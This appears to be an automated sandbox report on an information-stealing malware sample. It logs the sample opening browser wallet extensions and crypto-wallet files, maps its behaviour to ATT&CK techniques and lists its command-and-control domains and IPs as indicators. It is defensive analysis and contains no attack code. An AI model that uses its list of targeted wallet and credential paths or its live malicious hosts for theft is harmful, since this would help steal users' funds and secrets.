      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts311
      Process Injection
      3
      Obfuscated Files or Information
      LSASS Memory1
      Network Service Discovery
      Remote Desktop Protocol31
      Data from Local System
      21
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution
      Logon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager11
      File and Directory Discovery
      SMB/Windows Admin Shares1
      Screen Capture
      3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell
      Login HookLogin Hook12
      Masquerading
      NTDS43
      System Information Discovery
      Distributed Component Object Model2
      Clipboard Data
      114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
      Virtualization/Sandbox Evasion
      LSA Secrets351
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
      Process Injection
      Cached Domain Credentials22
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551388 Sample: 7IXl1M9JGV.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 53 knifedxejsu.cyou 2->53 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 71 10 other signatures 2->71 11 7IXl1M9JGV.exe 1 2->11         started        13 svchost.exe 1 2 2->13         started        signatures3 process4 dnsIp5 16 cmd.exe 1 11->16         started        18 conhost.exe 11->18         started        61 127.0.0.1 unknown unknown 13->61 process6 process7 20 powershell.exe 14 24 16->20         started        dnsIp8 55 147.45.44.131, 49710, 80 FREE-NET-ASFREEnetEU Russian Federation 20->55 43 C:\Users\user\AppData\...\qh4rltex.cmdline, Unicode 20->43 dropped 45 C:\Users\user\AppData\Local\...\qh4rltex.0.cs, Unicode 20->45 dropped 73 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 20->73 75 Writes to foreign memory regions 20->75 77 Suspicious execution chain found 20->77 79 3 other signatures 20->79 25 RegAsm.exe 20->25         started        29 csc.exe 3 20->29         started        file9 signatures10 process11 dnsIp12 59 knifedxejsu.cyou 104.21.19.177, 443, 49711, 49712 CLOUDFLARENETUS United States 25->59 81 Query firmware table information (likely to detect VMs) 25->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 25->83 85 Tries to harvest and steal browser information (history, passwords, etc) 25->85 87 Tries to steal Crypto Currency Wallets 25->87 32 chrome.exe 2 25->32         started        47 C:\Users\user\AppData\Local\...\qh4rltex.dll, PE32 29->47 dropped 36 cvtres.exe 1 29->36         started        file13 signatures14 process15 dnsIp16 49 192.168.11.20, 137, 138, 1900 unknown unknown 32->49 51 239.255.255.250, 1900 unknown Reserved 32->51 63 Found many strings related to Crypto-Wallets (likely being stolen) 32->63 38 chrome.exe 32->38         started        41 chrome.exe 32->41         started        signatures17 process18 dnsIp19 57 www.google.com 142.251.35.164, 443, 49716, 49717 GOOGLEUS United States 38->57

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      7IXl1M9JGV.exe13%ReversingLabs
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll100%AviraHEUR/AGEN.1300034
      C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
      standartedby.shop100%Avira URL Cloudmalware
      http://polymer.github.io/PATENTS.txt0%Avira URL Cloudsafe
      http://polymer.github.io/AUTHORS.txt0%Avira URL Cloudsafe
      moutheventushz.shop100%Avira URL Cloudmalware
      https://issuetracker.google.com/3494892480%Avira URL Cloudsafe
      https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE0%Avira URL Cloudsafe
      https://knifedxejsu.cyou/100%Avira URL Cloudmalware
      https://www.rest.co.il0%Avira URL Cloudsafe
      http://unisolated.invalid/0%Avira URL Cloudsafe
      bakedstusteeb.shop100%Avira URL Cloudmalware
      https://windows-drivers-x04.blogspot.com0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      knifedxejsu.cyou
      104.21.19.177
      truetrue
        unknown
        www.google.com
        142.251.35.164
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          moutheventushz.shoptrue
          • Avira URL Cloud: malware
          unknown
          standartedby.shoptrue
          • Avira URL Cloud: malware
          unknown
          bakedstusteeb.shoptrue
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://duckduckgo.com/ac/?q=chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.rest.co.ilchrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkjdchrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://docs.google.com/document/Jchrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966951550.000009B400395000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133430794.000009B400950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129411778.000009B40005A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.968219385.000009B400395000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEchrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlphfchrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://dns-tunnel-check.googlezip.net/connectchrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpnchrome.exe, 00000008.00000002.2132716182.000009B400814000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://polymer.github.io/AUTHORS.txtchrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://docs.google.com/document/:chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.therealreal.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeer7chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.shutterfly.com/cart/chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.urbanoutfitters.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.saksfifthavenue.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/document/pchrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.zappos.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpchrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.guitarcenter.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://unisolated.invalid/chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://setup.office.comchrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.altardstate.com/cart/chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/chrome/tips/chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanchrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/?lfhs=2chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138020397.000009B40118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abrchrome.exe, 00000008.00000002.2134616236.000009B400BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.bestbuy.com/cartchrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ikea.com/us/en/shoppingcart/chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://setup.office.com/?ms.officeurl=setupchrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.youtube.com/?feature=ytcachrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/chrome/browser-tools/chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000008.00000002.2138795443.000009B4012BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.williams-sonoma.com/shoppingcart/chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134172551.000009B400AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://chrome.google.com/webstorechrome.exe, 00000008.00000003.972919073.000009B40155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.967814195.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972505265.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://polymer.github.io/PATENTS.txtchrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999704489.000009B401C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999615366.000009B401C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.google.com/dl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchccchrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://issuetracker.google.com/349489248chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
